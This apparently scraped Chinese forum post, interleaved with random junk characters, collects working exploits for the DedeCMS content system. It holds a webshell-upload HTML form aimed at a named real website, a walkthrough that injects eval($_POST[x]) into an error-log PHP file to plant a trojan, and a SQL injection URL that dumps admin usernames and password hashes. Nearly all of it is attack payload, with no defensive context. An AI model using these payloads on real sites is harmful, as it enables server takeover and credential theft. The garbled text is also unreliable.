( s. M6 A X/ [- f% r' P</head>$ O" t" B/ p+ t2 C% \
<body style="FONT-SIZE: 9pt">& v; v9 W1 R! a! R3 W5 @1 @- A
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
0 ~; f2 s0 H0 g<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
% H/ a$ O* }* L7 b<input type='hidden' name='activepath' value='/data/cache/' />
$ x- {1 g! x: c: e9 ~% P& Y<input type='hidden' name='cfg_basedir' value='../../' />% T; J! E7 t- d5 M6 x- E
<input type='hidden' name='cfg_imgtype' value='php' />
: u, w5 p6 R# v/ H<input type='hidden' name='cfg_not_allowall' value='txt' />
' ]2 w. H5 B! V' ] i<input type='hidden' name='cfg_softtype' value='php' /># G3 }7 T& a# a& l+ z; ?. i# h
<input type='hidden' name='cfg_mediatype' value='php' />6 Q( J, }5 _9 j' x, G9 E' W$ `
<input type='hidden' name='f' value='form1.enclosure' />
/ y* ?4 g7 p' b6 a) y! U, H<input type='hidden' name='job' value='upload' />
9 q" y3 P: Y k- X( Z2 X" k0 G<input type='hidden' name='newname' value='fly.php' />9 M+ P, o7 ~5 H, J4 Y1 F2 f& }
Select U Shell <input type='file' name='uploadfile' size='25' />
: m9 W/ I( P* v. m: M+ b<input type='submit' name='sb1' value='确定' />
$ d+ Z0 ^; Y9 ^</form>6 M$ a$ L$ f# L0 c/ N; j
<br />It's just a exp for the bug of Dedecms V55...<br />
/ @- H, T7 d" ]1 ?/ j: z8 UNeed register_globals = on...<br />9 b3 f6 _: |/ P* B
Fun the game,get a webshell at /data/cache/fly.php...<br />
* p+ M- d0 _% p0 S' c3 P5 [6 x" b</body>
}, D5 ?$ ^# C9 A; s</html>
7 d, R/ t+ R* p9 f5 i2 z9 i3 r+ w
2 ~- S. b- `- P$ s {4 X# L+ o' T0 I9 v: H
8 t, D" L- |. b% ]) K/ [" r5 u4 g: D
8 R$ x: V" l/ O/ ^* R$ o8 w
- \, |/ v! O; S) P! g9 j; Y9 v
: o+ Q1 E S) G3 w( @. {, f$ B* h
/ }# j! R! z% L. o# g3 ]* b9 @& d4 j: O9 Q' c* U
2 M! t- y: a/ _" \8 M; L织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞$ x8 A7 ]. Y% P
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。1 I/ h! D+ t: ?+ \8 Y/ c8 ?
1. 访问网址:
" O8 e0 d( H8 |6 F* V/ Lhttp://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
, r" Y3 G3 f6 d, ?* C$ t& b可看见错误信息
8 z6 K6 [6 y! k
7 I, L. t! q+ s" ?# G4 V n
" w& s; R3 L( u4 o) p2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。
; H- Q, H4 X2 }% r& U' ]9 E" n* dint(3) Error: Illegal double '1024e1024' value found during parsing# [- M2 l! u: ^/ Z5 |2 Y
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>1 |+ |, m' h$ k, v3 U
& P! O7 D/ g7 C; F' {8 n# |
. {$ N. x- E# s9 p) L! [
3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是
1 A5 V- @( m8 }, m+ }
" i/ b: T5 ?. L6 D
. X- d: u) \! o3 q8 x<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>
0 l# M$ r% C- Y, P5 e( c+ M. q! e0 K r
# R5 c1 G) L) H3 o# W; B( ~按确定后的看到第2步骤的信息表示文件木马上传成功.0 _& F/ `4 ~4 @" e5 N5 r$ S) E& T) V
# `$ F6 e4 r% |$ g9 }" A* H
" E. ^$ ]' t, ?3 O( [$ e' w# X; ?8 {2 x
6 O9 L" e4 Z( l- J7 E1 ]
, S( w3 e& w2 ]- m7 ^5 A# A- E0 w- @- h* X. S
4 T3 N# D# B" l$ O# t+ X/ }& E- c& C4 k) @5 R: z, |
: M5 }; t: f" H, S! j0 S
9 b6 a; T0 k4 T- ]! @, M9 r5 z: K8 s s
7 E- R2 v* z; v9 v" N9 j) M8 V$ e
织梦(DedeCms)plus/infosearch.php 文件注入漏洞& V& q2 V8 j1 b3 l4 O ]$ |. H! H
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|
发表于 2012-10-18 10:42:14
收藏
支持
反对